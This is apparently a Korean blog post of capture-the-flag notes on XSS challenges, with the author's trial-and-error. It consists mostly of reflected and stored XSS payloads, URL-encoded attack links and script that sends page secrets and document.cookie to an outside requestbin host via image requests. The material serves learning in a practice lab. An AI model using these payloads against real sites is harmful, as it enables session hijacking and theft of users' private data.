CTF ClientScript

Basic Script Prac

id,pw로 로그인

마이페이지 접속

placeholder값 가져오기

xss point

GET /scriptBasic/mypage.php?user=iddddd

user= "/> <script> var a = document.getElementsByName('info').innerHTML ; console.log(a); </script>//

-> getElementsByName은 배열이므로 [0]을 사용해서 첫번째 요소를 선택햐야한다

user="/> <script> var a = document.getElementsByName('info')[0].innerHTML; console.log(a); </script>//

-> 가져올 요소 값이 xss point 뒤에 존재해 img 태그 이용

user="/> <img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; console.log(secretData);"/>//

-> Flag Here..! 값 출력

user="/> <script>

var secretData = document.getElementsByName('info')[0].placeholder;

var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;

</script>

http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%20%3c%73%63%72%69%70%74%3e%0a%0a%76%61%72%20%73%65%63%72%65%74%44%61%74%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%0a%0a%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%0a%69%2e%73%72%63%20%3d%22%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%22%2b%73%65%63%72%65%74%44%61%74%61%3b%20%0a%0a%3c%2f%73%63%72%69%70%74%3e

안됨

user="/> <img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;"/>//

http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%20%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%0a%69%2e%73%72%63%20%3d%22%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%22%2b%73%65%63%72%65%74%44%61%74%61%3b%22%2f%3e%2f%2f

user="/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder;console.log(secretData); var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;"/>//

http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%65%63%72%65%74%44%61%74%61%29%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%0a%69%2e%73%72%63%20%3d%22%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%22%2b%73%65%63%72%65%74%44%61%74%61%3b%22%2f%3e%2f%2f

user="/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder;var a=console.log(secretData); var i = new Image(); i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+a;"/>//

http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%76%61%72%20%61%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%65%63%72%65%74%44%61%74%61%29%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%20%69%2e%73%72%63%20%3d%22%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%22%2b%61%3b%22%2f%3e%2f%2f

"/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; var i = new Image(); i.src ='https://en6ilak4u6pd9.x.pipedream.net/?secretData='+secretData;"/>

http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%20%69%2e%73%72%63%20%3d%27%ff%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%27%2b%73%65%63%72%65%74%44%61%74%61%3b%22%2f%3e

"/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; var i = new Image(); i.src ='https://en6ilak4u6pd9.x.pipedream.net/?secretData='+secretData;

http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%20%69%2e%73%72%63%20%3d%27%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%27%2b%73%65%63%72%65%74%44%61%74%61%3b

따옴표를 엄청 주의해야겠다 꺾

Steal Info

- URL뒤에 #이 붙을때 그 이후에 값은 서버에 전달되지 않는다

- #뒤는 프래그런트 처리가 되어 URL엔 전달되지만 서버에는 전달 되지 않는다

var targetTag =document.getElementById('targetFrame');
var DOMData= targetTag.contentDocument;

colsole.log(DOMData)
</script>

관리자의 쿠키를 빼와서 접속해야하나?

어디가 xss point인지 모르겠다

콘솔에

<p class="card-text">This is a Very Secret Info.</p>

var secretData = document.getElementsByClassName('card-text')[1].innerHTML; console.log(secretData);

This is a Very Secret Info. 출력

xss point

탈취페이지

<p class="card-text">This is a Very Secret Info.</p>

콘솔에

var secretData = document.getElementsByClassName('card-text')[1].innerHTML; console.log(secretData);

This is a Very Secret Info. 출력

게시판 뷰 페이지의 content

var targetTag =document.getElementById('targetFrame');
var DOMData= targetTag.contentDocument;

var secretData=DOMData.getElementsByClassName('card-text')[1].innerHTML;

var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;

</script>

URL에서 데이터를 전송할 때 인코딩을 사용하는 것은 안전성과 일관성을 유지하기 위한 좋은 실천 방법입니다. 특히, URL에 포함된 데이터에는 일부 특수 문자나 공백 등이 있을 수 있으며, 이러한 문자들은 URL에서 특별한 의미를 가지는 문자로 간주될 수 있습니다.

인코딩을 통해 이러한 문자들을 안전하게 전송 가능한 형태로 변환할 수 있습니다. 특히, URL 인코딩은 공백을 %20과 같이 변환하고, 특수 문자를 그에 상응하는 인코딩 값으로 변환합니다.

만약 데이터에 공백이나 특수 문자가 포함되어 있다면, 이러한 문자를 인코딩하지 않고 URL에 포함시키면 올바른 동작을 기대하기 어렵습니다. 특히, HTTP GET 요청의 경우 URL에 데이터를 포함시키기 때문에 안전성이 더욱 중요합니다.

secretData = encodeURIComponent(secretData);

    var i = new Image();
    i.src = "https://en6ilak4u6pd9.x.pipedream.net/?secretData=" + secretData;
  }
}
</script>

글 내용으로 위에거 작성하고

뷰링크 보내면 성공

Steal Info 2

게시판 내용

var cookieData = document.cookie;

var i = new Image();

i.src = "http://en6ilak4u6pd9.x.pipedream.net/?cookie=" + cookieData;

</script>

/?cookie=flag=flag_userId

secretData = encodeURIComponent(secretData);

    var i = new Image();
    i.src = "https://en6ilak4u6pd9.x.pipedream.net/?secretData=" + secretData;
  }
}
</script>

됐다

저작자표시

'CTF' 카테고리의 다른 글

CTF CSRF (1)	2024.01.30

MEANING

CTF ClientScript